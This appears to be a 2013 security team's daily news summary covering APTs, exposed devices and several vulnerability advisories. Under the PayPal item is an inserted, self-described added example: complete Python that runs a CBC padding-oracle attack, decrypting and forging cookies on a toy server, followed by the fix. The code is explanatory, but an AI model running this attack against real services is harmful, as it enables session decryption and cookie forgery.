Daily Summary - Tuesday 03-09-2013

End-of-Shift report

Timeframe: Monday 02-09-2013 18:00 - Tuesday 03-09-2013 18:00 Handler: Robert Waldner Co-Handler: n/a

Blog: NetTraveler Is Back: The Red Star APT Returns With New Tricks

NetTraveler, which we described in depth in a previous post, is an APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler (also known as "Travnet" or "Netfile") include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.


353,436 Exposed ZTE Devices Found In Net Census

mask.of.sanity writes "Hundreds of thousands of internet-accessible devices manufactured by Chinese telco ZTE have been found with default or hardcoded usernames and passwords. The devices were discovered in analysis of the huge dataset from the Internet Census run this year. ZTE topped the charts, accounting for 28 percent of all affected devices worldwide. Only one manufacturer has responded to the researchers' bid to supply the data in efforts to stop production of insecure devices."


USB keyboard hijacks the Linux kernel

The memory of a Linux system can be manipulated almost arbitrarily by USB devices, as ChromeOS developer Kees Cook discovered. He supplied a patch for the problem along with the report.


cPanel Multiple Vulnerabilities

A security issue and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information, bypass certain security restrictions, manipulate certain data, and gain escalated privileges and by malicious users to conduct script insertion attacks, bypass certain security restrictions, and compromise a vulnerable system.


Bugtraq: PayPal's "invalid" aksession Padding Oracle Flaw

The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery.
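The attack the post describes, carried through end to end as an added example (not code from the Bugtraq post or from PayPal): a toy server issues a cookie of the form IV || CBC ciphertext under a 64-bit block cipher with no MAC, and an attacker uses nothing but the server's valid/invalid padding verdict to decrypt the cookie and then forge a new one. The cipher is an assumption, since the post does not identify it; an 8-round Feistel network over 8-byte blocks stands in for it, and the cookie layout, the PKCS#7 padding, the `Server` class and the `uid=...;role=...` contents are constructed for this example. The base64 wrapping of the real cookie is omitted.

```python
import hashlib, hmac, os

BLOCK = 8  # 64-bit blocks, the one property the example shares with the real cookie's cipher
# Stand-in 64-bit block cipher: an 8-round Feistel network with an HMAC-SHA256
# round function (assumption; the list post does not identify the real cipher).
def _round(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, block):
    l, r = block[:4], block[4:]
    for i in range(8):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:4], block[4:]
    for i in reversed(range(8)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def chunks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

class Server:
    # Cookie = IV || CBC ciphertext with no MAC; only a padding verdict leaks.
    key = os.urandom(16)  # one long-term server key (constructed for the example)
    def make_cookie(self, plaintext):
        out = prev = os.urandom(BLOCK)  # random IV, sent in the clear
        for blk in chunks(pad(plaintext)):
            prev = block_encrypt(self.key, _xor(blk, prev))
            out += prev
        return out
    def read_cookie(self, cookie):
        blocks, plain = chunks(cookie), b""
        for prev, cur in zip(blocks, blocks[1:]):
            plain += _xor(block_decrypt(self.key, cur), prev)
        return unpad(plain)
    def padding_oracle(self, cookie):
        try:
            self.read_cookie(cookie)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, target):
    # Learn block_decrypt(key, target) one byte at a time, last byte first, by
    # crafting the block that precedes target and reading the padding verdict.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        want = BLOCK - pos  # padding value to force into bytes pos..7
        prev = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            prev[j] = inter[j] ^ want
        for guess in range(256):
            prev[pos] = guess
            if not oracle(bytes(prev) + target):
                continue
            if pos == BLOCK - 1:
                # "Valid" could also mean an accidental 02 02, 03 03 03, ...:
                # disturb the second-to-last byte and ask again to be sure.
                prev[pos - 1] ^= 0xFF
                ok = oracle(bytes(prev) + target)
                prev[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = guess ^ want
            break
        else:
            raise RuntimeError("oracle never accepted any padding")
    return bytes(inter)

def decrypt_with_oracle(oracle, cookie):
    blocks = chunks(cookie)
    plain = b"".join(_xor(recover_intermediate(oracle, c), p)
                     for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)

def forge_with_oracle(oracle, plaintext):
    # Forge without the key: fix the last ciphertext block, learn its decryption
    # via the oracle, pick the preceding block so the XOR gives the wanted
    # plaintext block, and repeat back to the IV.
    out = [bytes(BLOCK)]
    for blk in reversed(chunks(pad(plaintext))):
        out.insert(0, _xor(recover_intermediate(oracle, out[0]), blk))
    return b"".join(out)
```

With `s = Server()`, `decrypt_with_oracle(s.padding_oracle, s.make_cookie(b"uid=1001;role=user"))` returns the plaintext after at most 256 queries per byte, and `s.read_cookie(forge_with_oracle(s.padding_oracle, b"uid=1001;role=admin"))` returns the forged plaintext, so the attacker never needed the key. The second query for the last byte in `recover_intermediate` is the detail that naive implementations miss: a "valid" verdict can come from an accidental `02 02` rather than `01`. The server-side fix is not a different block size but authenticating the cookie (encrypt-then-MAC or an AEAD) and rejecting anything that fails the check before the padding is ever examined.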


[remote] - Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption

During an audit, the Mikrotik RouterOS sshd (ROSSSH) was found to contain a remote pre-authentication heap corruption in its sshd component. Exploitation of this vulnerability allows full access to the router device.


[webapps] - TP-Link TD-W8951ND - Multiple Vulnerabilities

Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923